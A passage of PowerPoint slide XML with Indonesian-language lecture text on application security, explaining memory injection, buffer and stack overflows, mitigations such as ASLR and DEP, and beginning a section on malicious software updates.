              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buffer overflow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format string, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input dan output, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> statis dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicadangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buffer overflow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buffer. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subrutin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program. Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanggil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subrutin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arbitrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>letak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ASLR) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Data (DEP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbahaya</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
